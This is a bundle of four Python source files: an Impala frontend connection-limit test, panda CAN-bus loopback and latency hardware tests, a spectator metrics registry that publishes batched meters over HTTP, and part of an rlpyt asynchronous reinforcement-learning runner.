test_frontend_connection_limit.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from threading import Thread
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
# This custom cluster test exercises how the front end thrift server handles a
# new client connection request after the maximum number of front end service
# threads (--fe_service_threads) has been allocated. If
# "--accepted_client_cnxn_timeout" > 0, new connection requests are rejected if
# they wait in the accepted queue for more than the specified timeout.
# See IMPALA-7800.
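# Summary of the two cases exercised below (no behavior beyond the tests themselves):
# with --fe_service_threads=1 --accepted_client_cnxn_timeout=0 a second connection
# simply waits in the accepted queue until the single service thread frees up, while
# with --accepted_client_cnxn_timeout=5000 a connection queued for more than 5
# seconds is rejected and the query issued on it fails.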
class TestFrontendConnectionLimit(CustomClusterTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestFrontendConnectionLimit, cls).add_test_dimensions()
def _connect_and_query(self, query, impalad):
client = impalad.service.create_beeswax_client()
try:
client.execute(query)
except Exception as e:
client.close()
raise ImpalaBeeswaxException(str(e))
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--fe_service_threads=1 --accepted_client_cnxn_timeout=0")
def test_no_connection_is_rejected(self):
""" IMPALA-7800: New connection request should not be rejected if
--accepted_client_cnxn_timeout=0"""
query = "select sleep(2000)"
impalad = self.cluster.get_any_impalad()
q1 = Thread(target=self._connect_and_query, args=(query, impalad,))
q2 = Thread(target=self._connect_and_query, args=(query, impalad,))
q1.start()
q2.start()
q1.join()
q2.join()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args="--fe_service_threads=1 --accepted_client_cnxn_timeout=5000")
def test_server_busy(self):
""" IMPALA-7800: Reject new incoming connections if --accepted_client_cnxn_timeout > 0
and the request spent too much time waiting in the accepted queue."""
client = self.create_impala_client()
client.execute_async("select sleep(7000)")
# This step should fail to open a session.
# create_impala_client() does not throw an error on connection failure.
# The only way to detect that the connection is invalid is to run a
# query on it.
client1 = self.create_impala_client()
caught_exception = False
try:
client1.execute("select sleep(8000)")
except Exception:
caught_exception = True
client.close()
assert caught_exception, 'Query on client1 did not fail as expected'
|
7_can_loopback.py
|
import os
import time
import random
import threading
from panda import Panda
from nose.tools import assert_equal, assert_less, assert_greater
from .helpers import panda_jungle, start_heartbeat_thread, reset_pandas, time_many_sends, test_all_pandas, test_all_gen2_pandas, clear_can_buffers, panda_connect_and_init
# Reset the pandas before running tests
def aaaa_reset_before_tests():
reset_pandas()
@test_all_pandas
@panda_connect_and_init
def test_send_recv(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.can_send_many([(0x1ba, 0, b"message", 0)]*2)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0,1,2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.05)
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
comp_kbps = time_many_sends(p_send, bus, p_recv, two_pandas=True)
saturation_pct = (comp_kbps/speed) * 100.0
assert_greater(saturation_pct, 80)
assert_less(saturation_pct, 100)
print("two pandas bus {}, 100 messages at speed {:4d}, comp speed is {:7.2f}, percent {:6.2f}".format(bus, speed, comp_kbps, saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_latency(p):
def test(p_send, p_recv):
p_send.set_can_loopback(False)
p_recv.set_can_loopback(False)
p_send.set_can_speed_kbps(0, 100)
p_recv.set_can_speed_kbps(0, 100)
time.sleep(0.05)
p_send.can_send_many([(0x1ba, 0, b"testmsg", 0)]*10)
time.sleep(0.05)
p_recv.can_recv()
p_send.can_recv()
busses = [0,1,2]
for bus in busses:
for speed in [100, 250, 500, 750, 1000]:
p_send.set_can_speed_kbps(bus, speed)
p_recv.set_can_speed_kbps(bus, speed)
time.sleep(0.1)
# clear can buffers
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
latencies = []
comp_kbps_list = []
saturation_pcts = []
num_messages = 100
for i in range(num_messages):
st = time.time()
p_send.can_send(0x1ab, b"message", bus)
r = []
while len(r) < 1 and (time.time() - st) < 5:
r = p_recv.can_recv()
et = time.time()
r_echo = []
while len(r_echo) < 1 and (time.time() - st) < 10:
r_echo = p_send.can_recv()
if len(r) == 0 or len(r_echo) == 0:
print("r: {}, r_echo: {}".format(r, r_echo))
assert_equal(len(r),1)
assert_equal(len(r_echo),1)
et = (et - st)*1000.0
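# The constant below appears to count the bits of a classic CAN frame with an
# 11-bit ID and an (assumed) 8-byte payload: SOF(1) + ID(11) + RTR(1) + IDE(1)
# + r0(1) + DLC(4) + data(8*8) + CRC(15) + CRC delim(1) + ACK(1) + ACK delim(1)
# + EOF(7) = 108 bits. Dividing a bit count by the elapsed time in milliseconds
# gives kbit/s, hence "comp_kbps".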
comp_kbps = (1+11+1+1+1+4+8*8+15+1+1+1+7) / et
latency = et - ((1+11+1+1+1+4+8*8+15+1+1+1+7) / speed)
assert_less(latency, 5.0)
saturation_pct = (comp_kbps/speed) * 100.0
latencies.append(latency)
comp_kbps_list.append(comp_kbps)
saturation_pcts.append(saturation_pct)
average_latency = sum(latencies)/num_messages
assert_less(average_latency, 1.0)
average_comp_kbps = sum(comp_kbps_list)/num_messages
average_saturation_pct = sum(saturation_pcts)/num_messages
print("two pandas bus {}, {} message average at speed {:4d}, latency is {:5.3f}ms, comp speed is {:7.2f}, percent {:6.2f}"\
.format(bus, num_messages, speed, average_latency, average_comp_kbps, average_saturation_pct))
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_gen2_pandas
@panda_connect_and_init
def test_gen2_loopback(p):
def test(p_send, p_recv):
for bus in range(4):
obd = False
if bus == 3:
obd = True
bus = 1
# Clear buses
clear_can_buffers(p_send)
clear_can_buffers(p_recv)
# Send a random string
addr = random.randint(1, 2000)
string = b"test"+os.urandom(4)
p_send.set_obd(obd)
p_recv.set_obd(obd)
time.sleep(0.2)
p_send.can_send(addr, string, bus)
time.sleep(0.2)
content = p_recv.can_recv()
# Check amount of messages
assert len(content) == 1
# Check content
assert content[0][0] == addr and content[0][2] == string
# Check bus
assert content[0][3] == bus
print("Bus:", bus, "OBD:", obd, "OK")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
try:
# Run tests in both directions
test(p, panda_jungle)
test(panda_jungle, p)
except Exception as e:
# Raise errors again, we don't want them to get lost
raise e
finally:
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
@test_all_pandas
@panda_connect_and_init
def test_bulk_write(p):
# The TX buffers on pandas are 0x100 in length.
NUM_MESSAGES_PER_BUS = 10000
def flood_tx(panda):
print('Sending!')
msg = b"\xaa"*4
packet = [[0xaa, None, msg, 0], [0xaa, None, msg, 1], [0xaa, None, msg, 2]] * NUM_MESSAGES_PER_BUS
# Disable timeout
panda.can_send_many(packet, timeout=0)
print(f"Done sending {3*NUM_MESSAGES_PER_BUS} messages!")
# Start heartbeat
start_heartbeat_thread(p)
# Set safety mode and power saving
p.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
p.set_power_save(False)
# Start transmission
threading.Thread(target=flood_tx, args=(p,)).start()
# Receive as much as we can in a few second time period
rx = []
old_len = 0
start_time = time.time()
while time.time() - start_time < 2 or len(rx) > old_len:
old_len = len(rx)
rx.extend(panda_jungle.can_recv())
print(f"Received {len(rx)} messages")
# All messages should have been received
if len(rx) != 3*NUM_MESSAGES_PER_BUS:
    raise Exception("Did not receive all messages!")
# Set back to silent mode
p.set_safety_mode(Panda.SAFETY_SILENT)
|
registry.py
|
import logging
import math
import sys
import threading
from spectator.clock import SystemClock
from spectator.counter import Counter, NoopCounter
from spectator.distsummary import DistributionSummary, NoopDistributionSummary
from spectator.gauge import Gauge, NoopGauge
from spectator.http import HttpClient
from spectator.id import MeterId
from spectator.timer import Timer, NoopTimer
logger = logging.getLogger("spectator.Registry")
try:
from spectatorconfig import default_config
defaultConfig = default_config()
logger.debug("loaded default config: %s", defaultConfig)
except:
defaultConfig = {}
class Registry:
noopGauge = NoopGauge()
noopCounter = NoopCounter()
noopDistributionSummary = NoopDistributionSummary()
noopTimer = NoopTimer()
addOp = 0
maxOp = 10
counterStats = {"count", "totalAmount", "totalTime",
"totalOfSquares", "percentile"}
def __init__(self, clock=SystemClock()):
self._clock = clock
self._lock = threading.RLock()
self._meters = {}
self._started = False
def clock(self):
return self._clock
def _new_meter(self, name, tags, meterFactory, meterCls, defaultIns):
with self._lock:
if tags is None:
tags = {}
meterId = MeterId(name, tags)
meter = self._meters.get(meterId, None)
if meter is None:
meter = meterFactory(meterId)
self._meters[meterId] = meter
elif not isinstance(meter, meterCls):
logger.warning("Meter is already defined as type %s. "
"Please use a unique name or tags",
meter.__class__.__name__)
return defaultIns
return meter
def counter(self, name, tags=None):
return self._new_meter(name, tags, lambda id: Counter(id), Counter,
self.noopCounter)
def timer(self, name, tags=None):
return self._new_meter(name, tags, lambda id: Timer(id, self._clock),
Timer, self.noopTimer)
def distribution_summary(self, name, tags=None):
return self._new_meter(name, tags, lambda id: DistributionSummary(id),
DistributionSummary,
self.noopDistributionSummary)
def gauge(self, name, tags=None):
return self._new_meter(name, tags, lambda id: Gauge(id, self._clock), Gauge,
self.noopGauge)
def __iter__(self):
with self._lock:
return RegistryIterator(self._meters.values())
def start(self, config=None):
if self._started:
logger.debug("registry already started")
return RegistryStopper(None)
else:
self._started = True
logger.info("starting registry")
if config is None:
logger.info("config not specified, using default")
config = defaultConfig
elif type(config) is not dict:
logger.warning("invalid config specified, using default")
config = defaultConfig
frequency = config.get("frequency", 5.0)
self._uri = config.get("uri", None)
self._batch_size = config.get("batch_size", 10000)
self._common_tags = config.get("common_tags", {})
self._client = HttpClient(self, config.get("timeout", 1))
self._timer = RegistryTimer(frequency, self._publish)
self._timer.start()
logger.debug("registry started with config: %s", config)
return RegistryStopper(self)
def clear_meters_and_start(self):
"""
This is called after a fork in the child process
to clear the cloned `_meters` and prevent duplicates
(the `_meters` are copied with the process
during the forking)
"""
self._meters = {}
self.start()
def stop_without_publish(self):
"""
This is called before a fork to prevent a potential deadlock.
It cancels the background timer thread. After the fork, the timer
thread is restarted in the main and cloned processes.
"""
if self._started:
self._timer.cancel()
self._started = False
def stop(self):
self.stop_without_publish()
# Even if not started, attempt to flush data to minimize risk
# of data loss
self._publish(disable_logging=True)
def _get_measurements(self):
"""
If there are no references in user code, then we expect four references to a meter:
1) meters map,
2) local variable in the for loop,
3) internal to ref count method, and
4) internal to the garbage collector.
"""
snapshot = []
with self._lock:
for k, m in list(self._meters.items()):
if sys.getrefcount(m) == 4:
if m.__class__.__name__ == 'Gauge':
if m._has_expired():
del self._meters[k]
else:
del self._meters[k]
ms = m._measure()
for id, value in ms.items():
if self._should_send(id, value):
snapshot.append((id, value))
return snapshot
def _send_batch(self, batch, disable_logging=False):
json = self._measurements_to_json(batch)
self._client.post_json(self._uri, json, disable_logging)
def _publish(self, disable_logging=False):
snapshot = self._get_measurements()
if not disable_logging and logger.isEnabledFor(logging.DEBUG):
for id, value in snapshot:
logger.debug("reporting: %s => %f", id, value)
if self._uri is not None:
i = 0
while i < len(snapshot):
end = min(i + self._batch_size, len(snapshot))
self._send_batch(snapshot[i:end])
i += self._batch_size
def _should_send(self, id, value):
    op = self._operation(id.tags())
    return not math.isnan(value) and (value > 0 or op == self.maxOp)
def _build_string_table(self, payload, data):
strings = {'name': 0}
for k, v in self._common_tags.items():
strings[k] = 0
strings[v] = 0
for id, _ in data:
strings[id.name] = 0
for k, v in id.tags().items():
strings[k] = 0
strings[v] = 0
keys = list(strings.keys())
keys.sort()
payload.append(len(keys))
payload.extend(keys)
for i, k in enumerate(keys):
strings[k] = i
return strings
def _measurements_to_json(self, data):
payload = []
strings = self._build_string_table(payload, data)
for id, v in data:
self._append_measurement(strings, payload, id, v)
return payload
def _append_measurement(self, strings, payload, id, value):
tags = id.tags()
op = self._operation(tags)
common_tags = self._common_tags
payload.append(len(tags) + 1 + len(common_tags))
for k, v in common_tags.items():
payload.append(strings[k])
payload.append(strings[v])
for k, v in tags.items():
payload.append(strings[k])
payload.append(strings[v])
payload.append(strings["name"])
payload.append(strings[id.name])
payload.append(op)
payload.append(value)
def _operation(self, tags):
if tags.get('statistic') in self.counterStats:
return self.addOp
else:
return self.maxOp
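# Worked example of the payload layout built above (my illustration, not from
# library docs). With common tag {"app": "demo"} and one measurement for the id
# ("server.requests", {"statistic": "count"}) with value 1.0, the sorted string
# table is ["app", "count", "demo", "name", "server.requests", "statistic"]
# (indices 0..5), so _measurements_to_json() would produce:
#   [6, "app", "count", "demo", "name", "server.requests", "statistic",
#    3, 0, 2, 5, 1, 3, 4, 0, 1.0]
# i.e. table length, the strings, then per measurement: tag-pair count,
# common-tag and tag key/value index pairs, the "name" key index, the name
# index, the operation (0 = add, since "count" is a counter statistic), and
# the value.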
class RegistryTimer:
def __init__(self, frequency, function):
self._frequency = frequency
self._function = function
self._cancelled = threading.Event()
self._thread = threading.Thread(target=self._run)
self._thread.daemon = True
def _run(self):
while not self._cancelled.wait(self._frequency):
try:
self._function()
except:
e = sys.exc_info()[0]
logger.exception("registry polling failed: %s", e)
def start(self):
self._thread.start()
def cancel(self):
self._cancelled.set()
self._thread.join()
class RegistryStopper:
def __init__(self, registry):
self._registry = registry
def __enter__(self):
pass
def __exit__(self, typ, value, traceback):
if self._registry is not None:
self._registry.stop()
class RegistryIterator:
def __init__(self, meters):
self._meters = list(meters)
self._pos = 0
def next(self):
# needed to work on 2.7
return self.__next__()
def __next__(self):
if self._pos < len(self._meters):
pos = self._pos
self._pos += 1
return self._meters[pos]
else:
raise StopIteration
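if __name__ == "__main__":
    # Minimal usage sketch (my addition, not part of the library). An empty
    # config has no "uri", so nothing is published over HTTP and only the
    # in-memory meters are exercised; this assumes the usual
    # Counter.increment() method of the Counter class imported above.
    registry = Registry()
    with registry.start({}):
        registry.counter("server.requests", {"statistic": "count"}).increment()
        print("registered meters:", len(list(registry)))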
|
async_rl.py
|
import time
import multiprocessing as mp
import psutil
import torch
from collections import deque
import math
from rlpyt.runners.base import BaseRunner
from rlpyt.utils.quick_args import save__init__args
from rlpyt.utils.logging import logger
from rlpyt.utils.collections import AttrDict
from rlpyt.utils.seed import set_seed, make_seed
from rlpyt.utils.prog_bar import ProgBarCounter
from rlpyt.utils.synchronize import drain_queue, find_port
THROTTLE_WAIT = 0.05
class AsyncRlBase(BaseRunner):
"""
Runs sampling and optimization asynchronously in separate Python
processes. May be useful to achieve higher hardware utilization, e.g.
CPUs fully busy simulating the environment while GPU fully busy training
the agent (there's no reason to use this CPU-only). This setup is
significantly more complicated than the synchronous (single- or multi-GPU)
runners, requires use of the asynchronous sampler, and may require special
methods in the algorithm.
Further parallelization within the sampler and optimizer are independent.
The asynchronous sampler can be serial, cpu-parallel, gpu-parallel, or
multi-gpu-parallel. The optimizer can be single- or multi-gpu.
The algorithm must initialize a replay buffer on OS shared memory. The
asynchronous sampler will allocate minibatch buffers on OS shared memory,
and yet another Python process is run to copy the completed minibatches
over to the algorithm's replay buffer. While that memory copy is
underway, the sampler immediately begins gathering the next minibatch.
Care should be taken to balance the rate at which the algorithm runs against
the rate of the sampler, as this can affect learning performance. In the existing
implementations, the sampler runs at full speed, and the algorithm may be throttled
not to exceed the specified relative rate. This is set by the algorithm's ``replay_ratio``,
which becomes the upper bound on the amount of training samples used in ratio with
the amount of samples generated. (In synchronous mode, the replay ratio is enforced
more precisely by running a fixed batch size and number of updates per iteration.)
The master process runs the (first) training GPU and performs all logging.
Within the optimizer, one agent exists. If multi-GPU, the same parameter
values are copied across all GPUs, and PyTorch's DistributedDataParallel
is used to all-reduce gradients (as in the synchronous multi-GPU runners).
Within the sampler, one agent exists. If new agent parameters are
available from the optimizer between sampler minibatches, then those
values are copied into the sampler before gathering the next minibatch.
Note:
The ``affinity`` argument should be a structure with ``sampler`` and
``optimizer`` attributes holding the respective hardware allocations.
Optimizer and sampler parallelization is determined from this.
"""
_eval = False
def __init__(
self,
algo,
agent,
sampler,
n_steps,
affinity,
seed=None,
log_interval_steps=1e5,
transfer=False, # Whether to transfer
transfer_arg=0., # Argument passed to transfer method
transfer_iter=150, # Iteration of training at which to transfer
transfer_timestep=0, # Overrides transfer_iter if not 0, timestep
):
n_steps = int(n_steps)
log_interval_steps = int(log_interval_steps)
save__init__args(locals())
def train(self):
"""
Run the optimizer in a loop. Check whether enough new samples have
been generated, and throttle down if necessary at each iteration. Log
at an interval in the number of sampler iterations, not optimizer
iterations.
"""
throttle_itr, delta_throttle_itr = self.startup()
throttle_time = 0.
sampler_itr = itr = 0
if self._eval:
while self.ctrl.sampler_itr.value < 1: # Sampler does eval first.
time.sleep(THROTTLE_WAIT)
traj_infos = drain_queue(self.traj_infos_queue, n_sentinel=1)
self.store_diagnostics(0, 0, traj_infos, ())
self.log_diagnostics(0, 0, 0)
log_counter = 0
while True: # Run until sampler hits n_steps and sets ctrl.quit=True.
logger.set_iteration(itr)
with logger.prefix(f"opt_itr #{itr} "):
while self.ctrl.sampler_itr.value < throttle_itr:
if self.ctrl.quit.value:
break
time.sleep(THROTTLE_WAIT)
throttle_time += THROTTLE_WAIT
if self.ctrl.quit.value:
break
if self.ctrl.opt_throttle is not None:
self.ctrl.opt_throttle.wait()
throttle_itr += delta_throttle_itr
opt_info = self.algo.optimize_agent(itr,
sampler_itr=self.ctrl.sampler_itr.value)
self.agent.send_shared_memory() # To sampler.
sampler_itr = self.ctrl.sampler_itr.value
traj_infos = (list() if self._eval else
drain_queue(self.traj_infos_queue))
self.store_diagnostics(itr, sampler_itr, traj_infos, opt_info)
if (sampler_itr // self.log_interval_itrs > log_counter):
if self._eval:
with self.ctrl.sampler_itr.get_lock():
traj_infos = drain_queue(self.traj_infos_queue, n_sentinel=1)
self.store_diagnostics(itr, sampler_itr, traj_infos, ())
self.log_diagnostics(itr, sampler_itr, throttle_time)
log_counter += 1
throttle_time = 0.
itr += 1
# Final log:
sampler_itr = self.ctrl.sampler_itr.value
traj_infos = drain_queue(self.traj_infos_queue)
if traj_infos or not self._eval:
self.store_diagnostics(itr, sampler_itr, traj_infos, ())
self.log_diagnostics(itr, sampler_itr, throttle_time)
self.shutdown()
def startup(self):
"""
Calls ``sampler.async_initialize()`` to get a double buffer for minibatches,
followed by ``algo.async_initialize()`` to get a replay buffer on shared memory,
then launches all workers (sampler, optimizer, memory copier).
"""
if self.seed is None:
self.seed = make_seed()
set_seed(self.seed)
double_buffer, examples = self.sampler.async_initialize(
agent=self.agent,
bootstrap_value=getattr(self.algo, "bootstrap_value", False),
traj_info_kwargs=self.get_traj_info_kwargs(),
seed=self.seed,
)
self.sampler_batch_size = self.sampler.batch_spec.size
self.world_size = len(self.affinity.optimizer)
n_itr = self.get_n_itr() # Number of sampler iterations.
replay_buffer = self.algo.async_initialize(
agent=self.agent,
sampler_n_itr=n_itr,
batch_spec=self.sampler.batch_spec,
mid_batch_reset=self.sampler.mid_batch_reset,
examples=examples,
world_size=self.world_size,
)
self.launch_workers(n_itr, double_buffer, replay_buffer)
throttle_itr, delta_throttle_itr = self.optim_startup()
return throttle_itr, delta_throttle_itr
def optim_startup(self):
"""
Sets the hardware affinity, moves the agent's model parameters onto
device, and initializes the data-parallel agent, if applicable. Computes
optimizer throttling settings.
"""
main_affinity = self.affinity.optimizer[0]
p = psutil.Process()
if main_affinity.get("set_affinity", True):
p.cpu_affinity(main_affinity["cpus"])
logger.log(f"Optimizer master CPU affinity: {p.cpu_affinity()}.")
torch.set_num_threads(main_affinity["torch_threads"])
logger.log(f"Optimizer master Torch threads: {torch.get_num_threads()}.")
self.agent.to_device(main_affinity.get("cuda_idx", None))
if self.world_size > 1:
self.agent.data_parallel()
self.algo.optim_initialize(rank=0)
throttle_itr = 1 + getattr(self.algo,
"min_steps_learn", 0) // self.sampler_batch_size
delta_throttle_itr = (self.algo.batch_size * self.world_size *
self.algo.updates_per_optimize / # (is updates_per_sync)
(self.sampler_batch_size * self.algo.replay_ratio))
self.initialize_logging()
return throttle_itr, delta_throttle_itr
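# Worked example for the throttling above (illustrative numbers only): with
# algo.batch_size=256, updates_per_optimize=4, world_size=1, replay_ratio=8 and
# sampler_batch_size=512, each optimizer iteration consumes 256*4=1024 training
# samples while one sampler iteration yields 512 new ones; keeping the replay
# ratio at 8 then gives delta_throttle_itr = 1024 / (512*8) = 0.25, i.e. up to
# four optimizer iterations per sampler iteration.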
def launch_workers(self, n_itr, double_buffer, replay_buffer):
self.traj_infos_queue = mp.Queue()
self.ctrl = self.build_ctrl(self.world_size)
self.launch_sampler(n_itr)
self.launch_memcpy(double_buffer, replay_buffer)
self.launch_optimizer_workers(n_itr)
def get_n_itr(self):
log_interval_itrs = max(self.log_interval_steps //
self.sampler_batch_size, 1)
n_itr = math.ceil(self.n_steps / self.log_interval_steps) * log_interval_itrs
self.log_interval_itrs = log_interval_itrs
self.n_itr = n_itr
# If we're transferring by timestep instead of iteration, round up to next iteration
if self.transfer_timestep:
self.transfer_iteration = int(-(-self.n_steps // self.itr_batch_size)) # Ceiling divide
logger.log(f"Running {n_itr} sampler iterations.")
return n_itr
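# Worked example for get_n_itr() above (illustrative numbers only): with
# n_steps=1e6, log_interval_steps=1e5 and sampler_batch_size=2048,
# log_interval_itrs = max(100000 // 2048, 1) = 48 and
# n_itr = ceil(1e6 / 1e5) * 48 = 480, i.e. roughly 480 * 2048 ~= 983k steps.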
def build_ctrl(self, world_size):
"""
Builds several parallel communication mechanisms for controlling the
workflow across processes.
"""
opt_throttle = (mp.Barrier(world_size) if world_size > 1 else
None)
return AttrDict(
quit=mp.Value('b', lock=True),
quit_opt=mp.RawValue('b'),
sample_ready=[mp.Semaphore(0) for _ in range(2)], # Double buffer.
sample_copied=[mp.Semaphore(1) for _ in range(2)],
sampler_itr=mp.Value('l', lock=True),
opt_throttle=opt_throttle,
eval_time=mp.Value('d', lock=True),
)
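# Handshake sketch for the double buffer (as used by run_async_sampler and
# memory_copier below): sample_copied[i] starts at 1 and sample_ready[i] at 0,
# so for each buffer i the sampler does sample_copied[i].acquire() ->
# obtain_samples() -> sample_ready[i].release(), while the matching copier does
# sample_ready[i].acquire() -> append to replay buffer -> sample_copied[i].release().
# The sampler can therefore fill buffer 1 while buffer 0 is still being copied.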
def launch_optimizer_workers(self, n_itr):
"""
If multi-GPU optimization, launches an optimizer worker for each GPU
and initializes ``torch.distributed.``
"""
if self.world_size == 1:
return
offset = self.affinity.optimizer[0].get("master_cpus", [0])[0]
port = find_port(offset=offset)
affinities = self.affinity.optimizer
runners = [AsyncOptWorker(
rank=rank,
world_size=self.world_size,
algo=self.algo,
agent=self.agent,
n_itr=n_itr,
affinity=affinities[rank],
seed=self.seed + 100,
ctrl=self.ctrl,
port=port,
) for rank in range(1, len(affinities))]
procs = [mp.Process(target=r.optimize, args=()) for r in runners]
for p in procs:
p.start()
torch.distributed.init_process_group(
backend="nccl",
rank=0,
world_size=self.world_size,
init_method=f"tcp://127.0.0.1:{port}",
)
self.optimizer_procs = procs
def launch_memcpy(self, sample_buffers, replay_buffer):
"""
Fork a Python process for each of the sampler double buffers. (It may
be overkill to use two separate processes here, may be able to simplify
to one and still get good performance.)
"""
procs = list()
for i in range(len(sample_buffers)): # (2 for double-buffer.)
ctrl = AttrDict(
quit=self.ctrl.quit,
sample_ready=self.ctrl.sample_ready[i],
sample_copied=self.ctrl.sample_copied[i],
)
procs.append(mp.Process(target=memory_copier,
args=(sample_buffers[i], self.algo.samples_to_buffer,
replay_buffer, ctrl)))
for p in procs:
p.start()
self.memcpy_procs = procs
def launch_sampler(self, n_itr):
target = run_async_sampler
kwargs = dict(
sampler=self.sampler,
affinity=self.affinity.sampler,
ctrl=self.ctrl,
traj_infos_queue=self.traj_infos_queue,
n_itr=n_itr,
)
if self._eval:
target = run_async_sampler_eval
kwargs["eval_itrs"] = self.log_interval_itrs
self.sampler_proc = mp.Process(target=target, kwargs=kwargs)
self.sampler_proc.start()
def shutdown(self):
self.pbar.stop()
logger.log("Master optimizer shutting down, joining sampler process...")
self.sampler_proc.join()
logger.log("Joining memory copiers...")
for p in self.memcpy_procs:
p.join()
if self.ctrl.opt_throttle is not None:
logger.log("Joining optimizer processes...")
self.ctrl.quit_opt.value = True
self.ctrl.opt_throttle.wait()
for p in self.optimizer_procs:
p.join()
logger.log("All processes shutdown. Training complete.")
def initialize_logging(self):
self._opt_infos = {k: list() for k in self.algo.opt_info_fields}
self._start_time = self._last_time = time.time()
self._last_itr = 0
self._last_sampler_itr = 0
self._last_update_counter = 0
def get_itr_snapshot(self, itr, sampler_itr):
return dict(
itr=itr,
sampler_itr=sampler_itr,
cum_steps=sampler_itr * self.sampler_batch_size,
cum_updates=self.algo.update_counter,
agent_state_dict=self.agent.state_dict(),
optimizer_state_dict=self.algo.optim_state_dict(),
)
def save_itr_snapshot(self, itr, sample_itr):
logger.log("saving snapshot...")
params = self.get_itr_snapshot(itr, sample_itr)
logger.save_itr_params(itr, params)
logger.log("saved")
def get_traj_info_kwargs(self):
return dict(discount=getattr(self.algo, "discount", 1))
def store_diagnostics(self, itr, sampler_itr, traj_infos, opt_info):
self._traj_infos.extend(traj_infos)
for k, v in self._opt_infos.items():
new_v = getattr(opt_info, k, [])
v.extend(new_v if isinstance(new_v, list) else [new_v])
self.pbar.update((sampler_itr + 1) % self.log_interval_itrs)
def log_diagnostics(self, itr, sampler_itr, throttle_time, prefix='Diagnostics/'):
self.pbar.stop()
self.save_itr_snapshot(itr, sampler_itr)
new_time = time.time()
time_elapsed = new_time - self._last_time
new_updates = self.algo.update_counter - self._last_update_counter
new_samples = self.sampler.batch_size * (sampler_itr - self._last_sampler_itr)
updates_per_second = (float('nan') if itr == 0 else
new_updates / time_elapsed)
samples_per_second = (float('nan') if itr == 0 else
new_samples / time_elapsed)
if self._eval:
new_eval_time = self.ctrl.eval_time.value
eval_time_elapsed = new_eval_time - self._last_eval_time
non_eval_time_elapsed = time_elapsed - eval_time_elapsed
non_eval_samples_per_second = (float('nan') if itr == 0 else
new_samples / non_eval_time_elapsed)
self._last_eval_time = new_eval_time
cum_steps = sampler_itr * self.sampler.batch_size # No * world_size.
replay_ratio = (new_updates * self.algo.batch_size * self.world_size /
max(1, new_samples))
cum_replay_ratio = (self.algo.update_counter * self.algo.batch_size *
self.world_size / max(1, cum_steps))
with logger.tabular_prefix(prefix):
logger.record_tabular('Iteration', itr)
logger.record_tabular('SamplerIteration', sampler_itr)
logger.record_tabular('CumTime (s)', new_time - self._start_time)
logger.record_tabular('CumSteps', cum_steps)
logger.record_tabular('CumUpdates', self.algo.update_counter)
logger.record_tabular('ReplayRatio', replay_ratio)
logger.record_tabular('CumReplayRatio', cum_replay_ratio)
logger.record_tabular('StepsPerSecond', samples_per_second)
if self._eval:
logger.record_tabular('NonEvalSamplesPerSecond', non_eval_samples_per_second)
logger.record_tabular('UpdatesPerSecond', updates_per_second)
logger.record_tabular('OptThrottle', (time_elapsed - throttle_time) /
time_elapsed)
self._log_infos()
self._last_time = new_time
self._last_itr = itr
self._last_sampler_itr = sampler_itr
self._last_update_counter = self.algo.update_counter
logger.dump_tabular(with_prefix=False)
logger.log(f"Optimizing over {self.log_interval_itrs} sampler "
"iterations.")
self.pbar = ProgBarCounter(self.log_interval_itrs)
def _log_infos(self, traj_infos=None):
if traj_infos is None:
traj_infos = self._traj_infos
if traj_infos:
for k in traj_infos[0]:
if not k.startswith("_"):
logger.record_tabular_misc_stat(k,
[info[k] for info in traj_infos])
if self._opt_infos:
for k, v in self._opt_infos.items():
logger.record_tabular_misc_stat(k, v)
self._opt_infos = {k: list() for k in self._opt_infos} # (reset)
class AsyncRl(AsyncRlBase):
"""
Asynchronous RL with online agent performance tracking.
"""
def __init__(self, *args, log_traj_window=100, **kwargs):
super().__init__(*args, **kwargs)
self.log_traj_window = int(log_traj_window)
def initialize_logging(self):
self._traj_infos = deque(maxlen=self.log_traj_window)
self._cum_completed_trajs = 0
self._new_completed_trajs = 0
super().initialize_logging()
logger.log(f"Optimizing over {self.log_interval_itrs} sampler "
"iterations.")
self.pbar = ProgBarCounter(self.log_interval_itrs)
def store_diagnostics(self, itr, sampler_itr, traj_infos, opt_info):
self._cum_completed_trajs += len(traj_infos)
self._new_completed_trajs += len(traj_infos)
super().store_diagnostics(itr, sampler_itr, traj_infos, opt_info)
